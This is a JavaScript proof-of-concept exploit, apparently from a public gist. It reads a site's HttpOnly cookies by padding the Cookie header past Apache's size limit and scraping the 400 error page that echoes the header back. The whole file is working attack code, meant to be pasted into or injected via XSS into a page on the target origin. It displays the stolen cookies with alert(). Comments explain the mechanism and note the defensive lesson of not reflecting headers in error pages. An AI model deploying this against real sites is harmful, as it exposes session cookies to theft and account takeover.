// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
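function setCookies (good, count, size) {
  // Plant (or expire) `count` padding cookies named xss0..xss<count-1>, each
  // holding `size` bytes of "x", on path "/" for the current origin.
  //
  // With the defaults (10 cookies of 819 bytes) the Cookie header the browser
  // then sends is a little over 8 KB -- presumably chosen to exceed a server's
  // per-header-field limit (Apache's default LimitRequestFieldSize is 8190) so
  // that the server rejects the next request with a 400. Several cookies are
  // used because browsers cap a single cookie at roughly 4 KB (comment above).
  //
  // good  - truthy: expire the padding cookies (cleanup); falsy or omitted:
  //         set them.
  // count - number of padding cookies, default 10. Anything that later strips
  //         xss<N> names out of an echoed Cookie header must accept every N
  //         that is set here.
  // size  - bytes of padding per cookie, default 819.
  // Side effect only (writes document.cookie); returns nothing.
  var n = (count === undefined) ? 10 : count;
  var width = (size === undefined) ? 819 : size;

  // The padding value is loop-invariant: build it once.
  var padding = "";
  for (var k = 0; k < width; k++) {
    padding += "x";
  }
  // An expiry date in the past tells the browser to discard the cookie.
  var expired = new Date(Date.now() - 1).toUTCString();

  for (var i = 0; i < n; i++) {
    var name = "xss" + i;
    if (good) {
      // The path must match the one used when the cookie was set, or the
      // browser treats this as a different cookie and the bomb stays armed.
      document.cookie = name + "=;expires=" + expired + "; path=/;";
    } else {
      document.cookie = name + "=" + padding + ";path=/";
    }
  }
}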
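function makeRequest() {
  // Read this origin's cookies -- HttpOnly ones included -- by inflating the
  // Cookie header past the server's header-size limit and scraping the 400
  // error page the server answers with. The parser below expects that page to
  // echo the offending header as "Cookie: ..." inside a <pre> block, which is
  // how Apache's "request header field exceeds server limit" page looks.
  // Proof-of-concept: the recovered cookies are shown with alert().
  // Takes no arguments and returns nothing.
  //
  // Defensive takeaway: the bypass only works because the server reflects a
  // request header into its error page. Error pages should never echo
  // request headers.

  // Plant the padding cookies; the request below will carry the oversized
  // Cookie header.
  setCookies();

  // Parse the Cookie header echoed in html's <pre> block into a name -> value
  // object, dropping the xss<N> padding cookies. Returns null when html holds
  // no <pre> block at all (the original crashed on .length of a null match,
  // which also skipped the cookie cleanup).
  function parseCookieHeader(html) {
    var match = html.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
    if (!match) {
      return null;
    }
    // \d+ rather than \d so padding cookies beyond xss9 are stripped as well.
    var header = match[1].replace("Cookie: ", "").replace(/xss\d+=x+;?/g, '');
    var parts = header.split(/;/g);
    // Null prototype: a cookie named __proto__ or constructor must become an
    // own property, not clobber the object's prototype.
    var result = Object.create(null);
    for (var i = 0; i < parts.length; i++) {
      // Removing the padding cookies leaves empty segments and leading spaces
      // behind ("a=1;   b=2"); skip the former and trim the latter so names
      // come out clean.
      var part = parts[i].trim();
      if (part === "") {
        continue;
      }
      // Split on the first "=" only: values such as base64 tokens may contain
      // "=" themselves, which split('=', 2) would have truncated.
      var eq = part.indexOf("=");
      if (eq === -1) {
        result[part] = undefined;
      } else {
        result[part.slice(0, eq)] = part.slice(eq + 1);
      }
    }
    return result;
  }

  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState !== 4) {
      return;
    }
    // Only the 400 ("request header too large") page is expected to echo the
    // Cookie header; any other status means the server did not choke on it.
    var isBadRequest = xhr.status === 400;
    var cookies = null;
    try {
      if (isBadRequest) {
        cookies = parseCookieHeader(xhr.responseText);
      }
    } finally {
      // Expire the padding cookies as soon as the request completes -- on
      // every status and even if parsing threw. Otherwise the browser keeps
      // sending the oversized header on every request to this origin and the
      // user is locked out by a self-inflicted cookie bomb.
      setCookies(true);
    }
    if (isBadRequest) {
      alert(JSON.stringify(cookies || {}));
    }
  };
  xhr.open("GET", "/", true);
  xhr.send(null);
}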
// Entry point: runs as soon as the script is evaluated (e.g. pasted into the
// console of, or injected into, a page on the target origin), so the padding
// cookies are set and the probe request fires without any user interaction.
makeRequest();